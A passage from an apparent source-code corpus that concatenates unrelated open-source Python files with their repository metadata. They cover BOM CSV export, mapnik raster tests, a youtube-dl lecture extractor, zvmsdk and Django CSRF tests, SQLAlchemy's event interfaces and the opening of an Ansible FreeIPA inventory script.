        parts_by_manufacturer_part_number = self._get_parts_by_manufacturer_part_number()
        item = 0
        row_of_parts_without_number = None
        for part_number, part_info in parts_by_manufacturer_part_number.items():
            if part_number is not self._no_part_number:
                item += 1
            row = self._get_bom_row_from_part(item, part_number, part_info)
            if part_number is not self._no_part_number:
                bom.append(row)
            else:
                row_of_parts_without_number = row
        if row_of_parts_without_number:
            bom.append(row_of_parts_without_number)
        return bom

    def save_bom_csv_file(self):
        """Write the BOM to <output_dir>/bom.csv."""
        bom = self.get_bom()
        bom_filename = 'bom.csv'
        bom_output_path = os.path.join(self._output_dir, bom_filename)
        # NOTE(review): on Python 3 csv files should be opened with
        # newline='' per the csv docs; presumably this ran under Python 2.
        with open(bom_output_path, 'w') as f:
            bom_writer = csv.writer(f, quotechar='\"', quoting=csv.QUOTE_MINIMAL)
            for row in bom:
                bom_writer.writerow(row)

    def save_vendor_parts_csv_files(self):
        """Write one <vendor>_parts.csv order file per vendor."""
        parts_by_vendor = self._get_parts_by_vendor()
        for vendor, parts in parts_by_vendor.items():
            vendor_parts_filename = str(vendor) + '_parts.csv'
            vendor_parts_output_path = os.path.join(self._output_dir, vendor_parts_filename)
            with open(vendor_parts_output_path, 'w') as f:
                vendor_parts_writer = csv.writer(f, quotechar='\"', quoting=csv.QUOTE_MINIMAL)
                for part_number, part_info in parts.items():
                    row = self._get_vendor_row_from_part(part_number, part_info)
                    vendor_parts_writer.writerow(row)

    def save_all_csv_files(self):
        """Write the BOM CSV plus every vendor order CSV."""
        self.save_bom_csv_file()
        self.save_vendor_parts_csv_files()
def save_all_csv_files():
    """Module-level convenience wrapper: locate a netlist in the current
    directory tree and write every CSV output (BOM plus vendor files)."""
    KicadBom().save_all_csv_files()

# -----------------------------------------------------------------------------------------
if __name__ == '__main__':
    save_all_csv_files()
| gpl-2.0 |
mapycz/python-mapnik | test/python_tests/raster_symbolizer_test.py | 1 | 8474 | import os
from nose.tools import eq_
import mapnik
from .utilities import execution_path, get_unique_colors, run_all
def setup():
    # All of the paths used below are relative; if the tests are run from
    # another directory we need to chdir() into the test directory first.
    os.chdir(execution_path('.'))
def test_dataraster_coloring():
    """Render dataraster.tif through a discrete RasterColorizer and compare
    the output with the stored reference PNG (regenerate with UPDATE set)."""
    srs = '+init=epsg:32630'
    lyr = mapnik.Layer('dataraster')
    # Silently skip when the GDAL input plugin is not available.
    if 'gdal' in mapnik.DatasourceCache.plugin_names():
        lyr.datasource = mapnik.Gdal(
            file='../data/raster/dataraster.tif',
            band=1,
        )
        lyr.srs = srs
        _map = mapnik.Map(256, 256, srs)
        style = mapnik.Style()
        rule = mapnik.Rule()
        sym = mapnik.RasterSymbolizer()
        # Assigning a colorizer to the RasterSymbolizer tells the latter
        # that it should use it to colorize the raw data raster
        colorizer = mapnik.RasterColorizer(
            mapnik.COLORIZER_DISCRETE,
            mapnik.Color("transparent"))
        # Discrete stops: each value range maps to one flat color.
        for value, color in [
            (0, "#0044cc"),
            (10, "#00cc00"),
            (20, "#ffff00"),
            (30, "#ff7f00"),
            (40, "#ff0000"),
            (50, "#ff007f"),
            (60, "#ff00ff"),
            (70, "#cc00cc"),
            (80, "#990099"),
            (90, "#660066"),
            (200, "transparent"),
        ]:
            colorizer.add_stop(value, mapnik.Color(color))
        sym.colorizer = colorizer
        rule.symbols.append(sym)
        style.rules.append(rule)
        _map.append_style('foo', style)
        lyr.styles.append('foo')
        _map.layers.append(lyr)
        _map.zoom_to_box(lyr.envelope())
        im = mapnik.Image(_map.width, _map.height)
        mapnik.render(_map, im)
        expected_file = './images/support/dataraster_coloring.png'
        actual_file = '/tmp/' + os.path.basename(expected_file)
        im.save(actual_file, 'png32')
        # Create (or refresh) the reference image on first run or when the
        # UPDATE environment variable is set.
        if not os.path.exists(expected_file) or os.environ.get('UPDATE'):
            im.save(expected_file, 'png32')
        actual = mapnik.Image.open(actual_file)
        expected = mapnik.Image.open(expected_file)
        eq_(actual.tostring('png32'),
            expected.tostring('png32'),
            'failed comparing actual (%s) and expected (%s)' % (actual_file,
                                                                expected_file))
def test_dataraster_query_point():
    """Query individual points on a data raster layer: a valid cell, a point
    outside the raster extent, and a nodata cell."""
    srs = '+init=epsg:32630'
    lyr = mapnik.Layer('dataraster')
    # Silently skip when the GDAL input plugin is not available.
    if 'gdal' in mapnik.DatasourceCache.plugin_names():
        lyr.datasource = mapnik.Gdal(
            file='../data/raster/dataraster.tif',
            band=1,
        )
        lyr.srs = srs
        _map = mapnik.Map(256, 256, srs)
        _map.layers.append(lyr)
        x, y = 556113.0, 4381428.0  # center of extent of raster
        _map.zoom_all()
        features = list(_map.query_point(0, x, y))
        assert len(features) == 1
        feat = features[0]
        # The returned feature's envelope should be centered on the cell hit.
        center = feat.envelope().center()
        assert center.x == x and center.y == y, center
        value = feat['value']
        assert value == 18.0, value
        # point inside map extent but outside raster extent
        current_box = _map.envelope()
        current_box.expand_to_include(-427417, 4477517)
        _map.zoom_to_box(current_box)
        features = _map.query_point(0, -427417, 4477517)
        assert len(list(features)) == 0
        # point inside raster extent with nodata
        features = _map.query_point(0, 126850, 4596050)
        assert len(list(features)) == 0
def test_load_save_map():
    """Round-trip a map containing a RasterSymbolizer through load/save and
    check that the raster-related XML elements survive serialization."""
    map = mapnik.Map(256, 256)
    in_map = "../data/good_maps/raster_symbolizer.xml"
    try:
        mapnik.load_map(map, in_map)
        out_map = mapnik.save_map_to_string(map)
        assert 'RasterSymbolizer' in out_map
        assert 'RasterColorizer' in out_map
        assert 'stop' in out_map
    except RuntimeError as e:
        # Only tolerate the error raised when the map's datasource plugin is
        # not installed; anything else is a genuine failure.
        if 'Could not create datasource' not in str(e):
            # Bare re-raise preserves the original traceback; the old code
            # wrapped it in a fresh RuntimeError, discarding it. Callers
            # still see a RuntimeError either way.
            raise
def test_raster_with_alpha_blends_correctly_with_background():
    """Render a white raster carrying an alpha channel over a white map
    background and verify the blend collapses to a single near-white color."""
    WIDTH = 500
    HEIGHT = 500
    map = mapnik.Map(WIDTH, HEIGHT)
    WHITE = mapnik.Color(255, 255, 255)
    map.background = WHITE
    style = mapnik.Style()
    rule = mapnik.Rule()
    symbolizer = mapnik.RasterSymbolizer()
    symbolizer.scaling = mapnik.scaling_method.BILINEAR
    rule.symbols.append(symbolizer)
    style.rules.append(rule)
    map.append_style('raster_style', style)
    map_layer = mapnik.Layer('test_layer')
    filepath = '../data/raster/white-alpha.png'
    # Silently skip when the GDAL input plugin is not available.
    if 'gdal' in mapnik.DatasourceCache.plugin_names():
        map_layer.datasource = mapnik.Gdal(file=filepath)
        map_layer.styles.append('raster_style')
        map.layers.append(map_layer)
        map.zoom_all()
        mim = mapnik.Image(WIDTH, HEIGHT)
        mapnik.render(map, mim)
        mim.tostring()
        # All white is expected
        eq_(get_unique_colors(mim), ['rgba(254,254,254,255)'])
def test_raster_warping():
    """Reproject (warp) a UTM raster onto a long/lat map and compare the
    render with the stored reference PNG (regenerate with UPDATE set)."""
    lyrSrs = "+init=epsg:32630"
    mapSrs = '+proj=longlat +ellps=WGS84 +datum=WGS84 +no_defs'
    lyr = mapnik.Layer('dataraster', lyrSrs)
    # Silently skip when the GDAL input plugin is not available.
    if 'gdal' in mapnik.DatasourceCache.plugin_names():
        lyr.datasource = mapnik.Gdal(
            file='../data/raster/dataraster.tif',
            band=1,
        )
        sym = mapnik.RasterSymbolizer()
        sym.colorizer = mapnik.RasterColorizer(
            mapnik.COLORIZER_DISCRETE, mapnik.Color(255, 255, 0))
        rule = mapnik.Rule()
        rule.symbols.append(sym)
        style = mapnik.Style()
        style.rules.append(rule)
        _map = mapnik.Map(256, 256, mapSrs)
        _map.append_style('foo', style)
        lyr.styles.append('foo')
        _map.layers.append(lyr)
        # Transform the layer's extent from the layer SRS back into the map
        # SRS so the whole raster is in view.
        map_proj = mapnik.Projection(mapSrs)
        layer_proj = mapnik.Projection(lyrSrs)
        prj_trans = mapnik.ProjTransform(map_proj,
                                         layer_proj)
        _map.zoom_to_box(prj_trans.backward(lyr.envelope()))
        im = mapnik.Image(_map.width, _map.height)
        mapnik.render(_map, im)
        expected_file = './images/support/raster_warping.png'
        actual_file = '/tmp/' + os.path.basename(expected_file)
        im.save(actual_file, 'png32')
        # Create (or refresh) the reference image on first run or with UPDATE.
        if not os.path.exists(expected_file) or os.environ.get('UPDATE'):
            im.save(expected_file, 'png32')
        actual = mapnik.Image.open(actual_file)
        expected = mapnik.Image.open(expected_file)
        eq_(actual.tostring('png32'),
            expected.tostring('png32'),
            'failed comparing actual (%s) and expected (%s)' % (actual_file,
                                                                expected_file))
def test_raster_warping_does_not_overclip_source():
    """Zoom to a small box at the edge of the warped raster and check the
    source is not clipped too aggressively (compare against reference PNG)."""
    lyrSrs = "+init=epsg:32630"
    mapSrs = '+proj=longlat +ellps=WGS84 +datum=WGS84 +no_defs'
    lyr = mapnik.Layer('dataraster', lyrSrs)
    # Silently skip when the GDAL input plugin is not available.
    if 'gdal' in mapnik.DatasourceCache.plugin_names():
        lyr.datasource = mapnik.Gdal(
            file='../data/raster/dataraster.tif',
            band=1,
        )
        sym = mapnik.RasterSymbolizer()
        sym.colorizer = mapnik.RasterColorizer(
            mapnik.COLORIZER_DISCRETE, mapnik.Color(255, 255, 0))
        rule = mapnik.Rule()
        rule.symbols.append(sym)
        style = mapnik.Style()
        style.rules.append(rule)
        _map = mapnik.Map(256, 256, mapSrs)
        _map.background = mapnik.Color('white')
        _map.append_style('foo', style)
        lyr.styles.append('foo')
        _map.layers.append(lyr)
        # Fixed long/lat window over the raster's edge region.
        _map.zoom_to_box(mapnik.Box2d(3, 42, 4, 43))
        im = mapnik.Image(_map.width, _map.height)
        mapnik.render(_map, im)
        expected_file = './images/support/raster_warping_does_not_overclip_source.png'
        actual_file = '/tmp/' + os.path.basename(expected_file)
        im.save(actual_file, 'png32')
        # Create (or refresh) the reference image on first run or with UPDATE.
        if not os.path.exists(expected_file) or os.environ.get('UPDATE'):
            im.save(expected_file, 'png32')
        actual = mapnik.Image.open(actual_file)
        expected = mapnik.Image.open(expected_file)
        eq_(actual.tostring('png32'),
            expected.tostring('png32'),
            'failed comparing actual (%s) and expected (%s)' % (actual_file,
                                                                expected_file))
if __name__ == "__main__":
    # Direct execution: chdir into the test directory, then run every
    # module-level test_* function through the shared run_all() helper.
    setup()
    exit(run_all(eval(x) for x in dir() if x.startswith("test_")))
| lgpl-2.1 |
vimagick/youtube-dl | youtube_dl/extractor/collegerama.py | 111 | 3306 | from __future__ import unicode_literals
import json
from .common import InfoExtractor
from ..compat import compat_urllib_request
from ..utils import (
float_or_none,
int_or_none,
)
class CollegeRamaIE(InfoExtractor):
    """Extractor for Mediasite lectures hosted at collegerama.tudelft.nl."""
    _VALID_URL = r'https?://collegerama\.tudelft\.nl/Mediasite/Play/(?P<id>[\da-f]+)'
    _TESTS = [
        {
            'url': 'https://collegerama.tudelft.nl/Mediasite/Play/585a43626e544bdd97aeb71a0ec907a01d',
            'md5': '481fda1c11f67588c0d9d8fbdced4e39',
            'info_dict': {
                'id': '585a43626e544bdd97aeb71a0ec907a01d',
                'ext': 'mp4',
                'title': 'Een nieuwe wereld: waarden, bewustzijn en techniek van de mensheid 2.0.',
                'description': '',
                'thumbnail': 're:^https?://.*\.jpg$',
                'duration': 7713.088,
                'timestamp': 1413309600,
                'upload_date': '20141014',
            },
        },
        {
            'url': 'https://collegerama.tudelft.nl/Mediasite/Play/86a9ea9f53e149079fbdb4202b521ed21d?catalog=fd32fd35-6c99-466c-89d4-cd3c431bc8a4',
            'md5': 'ef1fdded95bdf19b12c5999949419c92',
            'info_dict': {
                'id': '86a9ea9f53e149079fbdb4202b521ed21d',
                'ext': 'wmv',
                'title': '64ste Vakantiecursus: Afvalwater',
                'description': 'md5:7fd774865cc69d972f542b157c328305',
                'duration': 10853,
                'timestamp': 1326446400,
                'upload_date': '20120113',
            },
        },
    ]
    def _real_extract(self, url):
        video_id = self._match_id(url)
        # Mimic the Mediasite player's JSON request for the stream list.
        player_options_request = {
            "getPlayerOptionsRequest": {
                "ResourceId": video_id,
                "QueryString": "",
            }
        }
        request = compat_urllib_request.Request(
            'http://collegerama.tudelft.nl/Mediasite/PlayerService/PlayerService.svc/json/GetPlayerOptions',
            json.dumps(player_options_request))
        request.add_header('Content-Type', 'application/json')
        player_options = self._download_json(request, video_id)
        presentation = player_options['d']['Presentation']
        title = presentation['Title']
        description = presentation.get('Description')
        thumbnail = None
        # Duration/UnixTime come back in milliseconds; scale to seconds.
        duration = float_or_none(presentation.get('Duration'), 1000)
        timestamp = int_or_none(presentation.get('UnixTime'), 1000)
        formats = []
        for stream in presentation['Streams']:
            for video in stream['VideoUrls']:
                # NOTE(review): the thumbnail is recomputed inside the inner
                # loop, so the last stream with a ThumbnailUrl wins --
                # presumably intentional, but worth confirming.
                thumbnail_url = stream.get('ThumbnailUrl')
                if thumbnail_url:
                    thumbnail = 'http://collegerama.tudelft.nl' + thumbnail_url
                format_id = video['MediaType']
                # Skip 'SS' entries (presumably SmoothStreaming -- confirm).
                if format_id == 'SS':
                    continue
                formats.append({
                    'url': video['Location'],
                    'format_id': format_id,
                })
        self._sort_formats(formats)
        return {
            'id': video_id,
            'title': title,
            'description': description,
            'thumbnail': thumbnail,
            'duration': duration,
            'timestamp': timestamp,
            'formats': formats,
        }
| unlicense |
mfcloud/python-zvm-sdk | zvmsdk/tests/unit/test_utils.py | 1 | 1438 | # Copyright 2017 IBM Corp.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import mock
import zvmsdk.utils as zvmutils
from zvmsdk.tests.unit import base
class ZVMUtilsTestCases(base.SDKTestCase):
    """Unit tests for small helpers in zvmsdk.utils."""
    def test_convert_to_mb(self):
        # convert_to_mb() parses '<number><G|M|T>' strings and returns the
        # size in MB using binary multiples (2.3 * 1024 == 2355.2, etc.).
        self.assertEqual(2355.2, zvmutils.convert_to_mb('2.3G'))
        self.assertEqual(20, zvmutils.convert_to_mb('20M'))
        self.assertEqual(1153433.6, zvmutils.convert_to_mb('1.1T'))
    @mock.patch.object(zvmutils, 'get_smt_userid')
    def test_get_namelist(self, gsu):
        # With CONF.zvm.namelist configured (test default 'TSTNLIST'), the
        # configured value wins regardless of the SMT userid.
        gsu.return_value = 'TUID'
        self.assertEqual('TSTNLIST', zvmutils.get_namelist())
        # With no configured namelist, the name is derived from the SMT
        # userid -- apparently 'NL' + userid adjusted to 8 characters
        # ('NL00TUID' padded, 'NLSTUSER' truncated); see utils.get_namelist.
        base.set_conf('zvm', 'namelist', None)
        gsu.return_value = 'TUID'
        self.assertEqual('NL00TUID', zvmutils.get_namelist())
        gsu.return_value = 'TESTUSER'
        self.assertEqual('NLSTUSER', zvmutils.get_namelist())
        # Restore the default so later tests see the expected configuration.
        base.set_conf('zvm', 'namelist', 'TSTNLIST')
| apache-2.0 |
mshafiq9/django | tests/view_tests/tests/test_csrf.py | 253 | 3203 | from django.test import Client, SimpleTestCase, override_settings
from django.utils.translation import override
@override_settings(ROOT_URLCONF="view_tests.urls")
class CsrfViewTests(SimpleTestCase):
    """Tests for the default CSRF failure (403) view."""

    def setUp(self):
        super(CsrfViewTests, self).setUp()
        # Reject any POST that lacks a valid CSRF token.
        self.client = Client(enforce_csrf_checks=True)

    @override_settings(
        USE_I18N=True,
        MIDDLEWARE_CLASSES=[
            'django.middleware.locale.LocaleMiddleware',
            'django.middleware.common.CommonMiddleware',
            'django.middleware.csrf.CsrfViewMiddleware',
        ],
    )
    def test_translation(self):
        """An invalid request is rejected with a localized error message."""
        resp = self.client.post('/')
        self.assertContains(resp, "Forbidden", status_code=403)
        self.assertContains(resp,
                            "CSRF verification failed. Request aborted.",
                            status_code=403)
        # With a Dutch LANGUAGE_CODE the failure page comes back in
        # Dutch, even though 'en-us' is active in the test thread.
        with self.settings(LANGUAGE_CODE='nl'), override('en-us'):
            resp = self.client.post('/')
            self.assertContains(resp, "Verboden", status_code=403)
            self.assertContains(resp,
                                "CSRF-verificatie mislukt. Verzoek afgebroken.",
                                status_code=403)

    @override_settings(
        SECURE_PROXY_SSL_HEADER=('HTTP_X_FORWARDED_PROTO', 'https')
    )
    def test_no_referer(self):
        """
        The Referer header is strictly checked for POST over HTTPS;
        omitting it triggers a dedicated explanation on the 403 page.
        """
        resp = self.client.post('/', HTTP_X_FORWARDED_PROTO='https')
        self.assertContains(resp,
                            "You are seeing this message because this HTTPS "
                            "site requires a 'Referer header' to be "
                            "sent by your Web browser, but none was sent.",
                            status_code=403)

    def test_no_cookies(self):
        """
        The CSRF cookie is checked for POST; a missing cookie yields an
        explanatory 403 page.
        """
        resp = self.client.post('/')
        self.assertContains(resp,
                            "You are seeing this message because this site "
                            "requires a CSRF cookie when submitting forms. "
                            "This cookie is required for security reasons, to "
                            "ensure that your browser is not being hijacked "
                            "by third parties.",
                            status_code=403)

    # In Django 1.10, this can be changed to TEMPLATES=[] because the code path
    # that reads the TEMPLATE_* settings in that case will have been removed.
    @override_settings(TEMPLATES=[{
        'BACKEND': 'django.template.backends.dummy.TemplateStrings',
    }])
    def test_no_django_template_engine(self):
        """The CSRF view doesn't depend on the TEMPLATES configuration (#24388)."""
        resp = self.client.post('/')
        self.assertContains(resp, "Forbidden", status_code=403)
| bsd-3-clause |
xkcd1253/Mimi | flask/lib/python2.7/site-packages/sqlalchemy/events.py | 18 | 16768 | # sqlalchemy/events.py
# Copyright (C) 2005-2012 the SQLAlchemy authors and contributors <see AUTHORS file>
#
# This module is part of SQLAlchemy and is released under
# the MIT License: http://www.opensource.org/licenses/mit-license.php
"""Core event interfaces."""
from sqlalchemy import event, exc, util
engine = util.importlater('sqlalchemy', 'engine')
pool = util.importlater('sqlalchemy', 'pool')
class DDLEvents(event.Events):
    """
    Define event listeners for schema objects, that is,
    :class:`.SchemaItem` and :class:`.SchemaEvent` subclasses,
    including :class:`.MetaData`, :class:`.Table`, :class:`.Column`.

    Two families of hooks are provided:

    * CREATE/DROP hooks, fired by :class:`.MetaData` and
      :class:`.Table` when DDL is emitted to the database.
    * attachment hooks, fired whenever a child schema element is
      associated with a parent, such as a :class:`.Column` with its
      :class:`.Table` or a :class:`.ForeignKeyConstraint` with a
      :class:`.Table`.

    Example using the ``after_create`` event::

        from sqlalchemy import event
        from sqlalchemy import Table, Column, Metadata, Integer

        m = MetaData()
        some_table = Table('some_table', m, Column('data', Integer))

        def after_create(target, connection, **kw):
            connection.execute("ALTER TABLE %s SET name=foo_%s" %
                                    (target.name, target.name))

        event.listen(some_table, "after_create", after_create)

    DDL events integrate closely with the :class:`.DDL` class and the
    :class:`.DDLElement` hierarchy of DDL clause constructs, which are
    themselves appropriate as listener callables::

        from sqlalchemy import DDL
        event.listen(
            some_table,
            "after_create",
            DDL("ALTER TABLE %(table)s SET name=foo_%(table)s")
        )

    The methods here define the name of an event as well
    as the names of members that are passed to listener
    functions.

    See also:

        :ref:`event_toplevel`

        :class:`.DDLElement`

        :class:`.DDL`

        :ref:`schema_ddl_sequences`

    """

    def before_create(self, target, connection, **kw):
        """Called before CREATE statements are emitted.

        :param target: the :class:`.MetaData` or :class:`.Table`
         object which is the target of the event.
        :param connection: the :class:`.Connection` where the
         CREATE statement or statements will be emitted.
        :param \**kw: additional keyword arguments relevant
         to the event.  The contents of this dictionary may vary
         across releases, and include the list of tables being
         generated for a metadata-level event, the checkfirst flag,
         and other elements used by internal events.

        """

    def after_create(self, target, connection, **kw):
        """Called after CREATE statements are emitted.

        :param target: the :class:`.MetaData` or :class:`.Table`
         object which is the target of the event.
        :param connection: the :class:`.Connection` where the
         CREATE statement or statements have been emitted.
        :param \**kw: additional keyword arguments relevant
         to the event.  The contents of this dictionary may vary
         across releases, and include the list of tables being
         generated for a metadata-level event, the checkfirst flag,
         and other elements used by internal events.

        """

    def before_drop(self, target, connection, **kw):
        """Called before DROP statements are emitted.

        :param target: the :class:`.MetaData` or :class:`.Table`
         object which is the target of the event.
        :param connection: the :class:`.Connection` where the
         DROP statement or statements will be emitted.
        :param \**kw: additional keyword arguments relevant
         to the event.  The contents of this dictionary may vary
         across releases, and include the list of tables being
         generated for a metadata-level event, the checkfirst flag,
         and other elements used by internal events.

        """

    def after_drop(self, target, connection, **kw):
        """Called after DROP statements are emitted.

        :param target: the :class:`.MetaData` or :class:`.Table`
         object which is the target of the event.
        :param connection: the :class:`.Connection` where the
         DROP statement or statements have been emitted.
        :param \**kw: additional keyword arguments relevant
         to the event.  The contents of this dictionary may vary
         across releases, and include the list of tables being
         generated for a metadata-level event, the checkfirst flag,
         and other elements used by internal events.

        """

    def before_parent_attach(self, target, parent):
        """Called before a :class:`.SchemaItem` is associated with
        a parent :class:`.SchemaItem`.

        :param target: the target object
        :param parent: the parent to which the target is being attached.

        :func:`.event.listen` also accepts a modifier for this event:

        :param propagate=False: When True, the listener function will
         be established for any copies made of the target object,
         i.e. those copies that are generated when
         :meth:`.Table.tometadata` is used.

        """

    def after_parent_attach(self, target, parent):
        """Called after a :class:`.SchemaItem` is associated with
        a parent :class:`.SchemaItem`.

        :param target: the target object
        :param parent: the parent to which the target is being attached.

        :func:`.event.listen` also accepts a modifier for this event:

        :param propagate=False: When True, the listener function will
         be established for any copies made of the target object,
         i.e. those copies that are generated when
         :meth:`.Table.tometadata` is used.

        """

    def column_reflect(self, table, column_info):
        """Called for each unit of 'column info' retrieved when
        a :class:`.Table` is being reflected.

        The dictionary of column information as returned by the
        dialect is passed, and can be modified; it is the same
        dictionary returned in each element of the list produced by
        :meth:`.reflection.Inspector.get_columns`.  The event is
        called before any action is taken against the dictionary.
        The :class:`.Column`-specific arguments ``info``, ``key``,
        and ``quote`` can also be added and will be passed to the
        constructor of :class:`.Column`.

        This event is only meaningful if it is associated either with
        the :class:`.Table` class across the board, e.g.::

            from sqlalchemy.schema import Table
            from sqlalchemy import event

            def listen_for_reflect(table, column_info):
                "receive a column_reflect event"
                # ...

            event.listen(
                    Table,
                    'column_reflect',
                    listen_for_reflect)

        ...or with a specific :class:`.Table` instance using
        the ``listeners`` argument::

            def listen_for_reflect(table, column_info):
                "receive a column_reflect event"
                # ...

            t = Table(
                'sometable',
                autoload=True,
                listeners=[
                    ('column_reflect', listen_for_reflect)
                ])

        This is because the reflection process initiated by
        ``autoload=True`` completes within the scope of the
        constructor for :class:`.Table`.

        """
class SchemaEventTarget(object):
    """Base class for elements that are the targets of :class:`.DDLEvents` events.

    This includes :class:`.SchemaItem` as well as :class:`.SchemaType`.

    """
    # Event dispatcher through which DDLEvents listeners are invoked.
    dispatch = event.dispatcher(DDLEvents)

    def _set_parent(self, parent):
        """Associate with this SchemaEvent's parent object.

        Subclasses must override; the base implementation raises.
        """
        raise NotImplementedError()

    def _set_parent_with_dispatch(self, parent):
        # Wrap the concrete _set_parent() with the before/after
        # parent-attach events so listeners observe both sides.
        self.dispatch.before_parent_attach(self, parent)
        self._set_parent(parent)
        self.dispatch.after_parent_attach(self, parent)
class PoolEvents(event.Events):
    """Available events for :class:`.Pool`.

    The methods here define the name of an event as well
    as the names of members that are passed to listener
    functions.

    e.g.::

        from sqlalchemy import event

        def my_on_checkout(dbapi_conn, connection_rec, connection_proxy):
            "handle an on checkout event"

        event.listen(Pool, 'checkout', my_on_checkout)

    In addition to :class:`.Pool` classes and instances,
    :class:`.PoolEvents` also accepts :class:`.Engine` objects and the
    :class:`.Engine` class as targets; these are resolved to the
    engine's ``.pool`` attribute or to the :class:`.Pool` class::

        engine = create_engine("postgresql://scott:tiger@localhost/test")

        # will associate with engine.pool
        event.listen(engine, 'checkout', my_on_checkout)

    """

    @classmethod
    def _accept_with(cls, target):
        # Resolve Engine targets to their pool; the Engine class
        # itself maps to the Pool class.
        if isinstance(target, type):
            if issubclass(target, engine.Engine):
                return pool.Pool
            if issubclass(target, pool.Pool):
                return target
            # any other class: no target resolved (implicit None)
        elif isinstance(target, engine.Engine):
            return target.pool
        else:
            return target

    def connect(self, dbapi_connection, connection_record):
        """Called once for each new DB-API connection or Pool's ``creator()``.

        :param dbapi_con:
          A newly connected raw DB-API connection (not a SQLAlchemy
          ``Connection`` wrapper).

        :param con_record:
          The ``_ConnectionRecord`` that persistently manages the connection

        """

    def first_connect(self, dbapi_connection, connection_record):
        """Called exactly once for the first DB-API connection.

        :param dbapi_con:
          A newly connected raw DB-API connection (not a SQLAlchemy
          ``Connection`` wrapper).

        :param con_record:
          The ``_ConnectionRecord`` that persistently manages the connection

        """

    def checkout(self, dbapi_connection, connection_record, connection_proxy):
        """Called when a connection is retrieved from the Pool.

        :param dbapi_con:
          A raw DB-API connection

        :param con_record:
          The ``_ConnectionRecord`` that persistently manages the connection

        :param con_proxy:
          The ``_ConnectionFairy`` which manages the connection for the
          span of the current checkout.

        If you raise a :class:`~sqlalchemy.exc.DisconnectionError`, the
        current connection will be disposed and a fresh connection
        retrieved.  Processing of all checkout listeners will abort and
        restart using the new connection.

        """

    def checkin(self, dbapi_connection, connection_record):
        """Called when a connection returns to the pool.

        Note that the connection may be closed, and may be None if the
        connection has been invalidated.  ``checkin`` will not be called
        for detached connections.  (They do not return to the pool.)

        :param dbapi_con:
          A raw DB-API connection

        :param con_record:
          The ``_ConnectionRecord`` that persistently manages the connection

        """
class ConnectionEvents(event.Events):
    """Available events for :class:`.Connection`.

    The methods here define the name of an event as well as the names
    of members that are passed to listener functions.

    e.g.::

        from sqlalchemy import event, create_engine

        def before_execute(conn, clauseelement, multiparams, params):
            log.info("Received statement: %s" % clauseelement)

        engine = create_engine('postgresql://scott:tiger@localhost/test')
        event.listen(engine, "before_execute", before_execute)

    Some events allow modifiers to the listen() function.

    :param retval=False: Applies to the :meth:`.before_execute` and
      :meth:`.before_cursor_execute` events only.  When True, the
      user-defined event function must have a return value, which
      is a tuple of parameters that replace the given statement
      and parameters.  See those methods for a description of
      specific return arguments.

    """

    @classmethod
    def _listen(cls, target, identifier, fn, retval=False):
        target._has_events = True

        if not retval:
            # Listeners registered without retval=True are wrapped so
            # that the original statement/parameters pass through
            # unchanged regardless of what the listener returns.
            if identifier == 'before_execute':
                user_fn = fn
                def wrap(conn, clauseelement, multiparams, params):
                    user_fn(conn, clauseelement, multiparams, params)
                    return clauseelement, multiparams, params
                fn = wrap
            elif identifier == 'before_cursor_execute':
                user_fn = fn
                def wrap(conn, cursor, statement,
                        parameters, context, executemany):
                    user_fn(conn, cursor, statement,
                            parameters, context, executemany)
                    return statement, parameters
                fn = wrap
        elif identifier not in ('before_execute', 'before_cursor_execute'):
            # retval=True is only meaningful for the two events whose
            # return value replaces the statement being executed.
            raise exc.ArgumentError(
                "Only the 'before_execute' and "
                "'before_cursor_execute' engine "
                "event listeners accept the 'retval=True' "
                "argument.")
        event.Events._listen(target, identifier, fn)

    def before_execute(self, conn, clauseelement, multiparams, params):
        """Intercept high level execute() events."""

    def after_execute(self, conn, clauseelement, multiparams, params, result):
        """Intercept high level execute() events."""

    def before_cursor_execute(self, conn, cursor, statement,
                        parameters, context, executemany):
        """Intercept low-level cursor execute() events."""

    def after_cursor_execute(self, conn, cursor, statement,
                        parameters, context, executemany):
        """Intercept low-level cursor execute() events."""

    def dbapi_error(self, conn, cursor, statement, parameters,
                        context, exception):
        """Intercept a raw DBAPI error.

        This event is called with the DBAPI exception instance
        received from the DBAPI itself, *before* SQLAlchemy wraps the
        exception with its own exception wrappers, and before any
        other operations are performed on the DBAPI cursor; the
        existing transaction remains in effect as well as any state
        on the cursor.

        The use case here is to inject low-level exception handling
        into an :class:`.Engine`, typically for logging and
        debugging purposes.   In general, user code should **not** modify
        any state or throw any exceptions here as this will
        interfere with SQLAlchemy's cleanup and error handling
        routines.

        Subsequent to this hook, SQLAlchemy may attempt any
        number of operations on the connection/cursor, including
        closing the cursor, rolling back of the transaction in the
        case of connectionless execution, and disposing of the entire
        connection pool if a "disconnect" was detected.   The
        exception is then wrapped in a SQLAlchemy DBAPI exception
        wrapper and re-thrown.

        .. versionadded:: 0.7.7

        """

    def begin(self, conn):
        """Intercept begin() events."""

    def rollback(self, conn):
        """Intercept rollback() events."""

    def commit(self, conn):
        """Intercept commit() events."""

    def savepoint(self, conn, name=None):
        """Intercept savepoint() events."""

    def rollback_savepoint(self, conn, name, context):
        """Intercept rollback_savepoint() events."""

    def release_savepoint(self, conn, name, context):
        """Intercept release_savepoint() events."""

    def begin_twophase(self, conn, xid):
        """Intercept begin_twophase() events."""

    def prepare_twophase(self, conn, xid):
        """Intercept prepare_twophase() events."""

    def rollback_twophase(self, conn, xid, is_prepared):
        """Intercept rollback_twophase() events."""

    def commit_twophase(self, conn, xid, is_prepared):
        """Intercept commit_twophase() events."""
| gpl-2.0 |
shepdelacreme/ansible | contrib/inventory/freeipa.py | 67 | 3992 | #!/usr/bin/env python
# Copyright (c) 2017 Ansible Project
# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
import argparse
from distutils.version import LooseVersion
import json
import os
import sys
from ipalib import api, errors, __version__ as IPA_VERSION
from six import u
def initialize():
    '''
    Initialize the FreeIPA/IPA API and return it.

    This function requires no arguments.  A kerberos key must be
    present in the user's keyring in order for this to work.  The IPA
    default configuration directory is /etc/ipa; this path can be
    overridden with the IPA_CONFDIR environment variable.
    '''

    api.bootstrap(context='cli')

    # A missing confdir is only a warning here; bootstrap above has
    # already fallen back to built-in defaults.
    if not os.path.isdir(api.env.confdir):
        print("WARNING: IPA configuration directory (%s) is missing. "
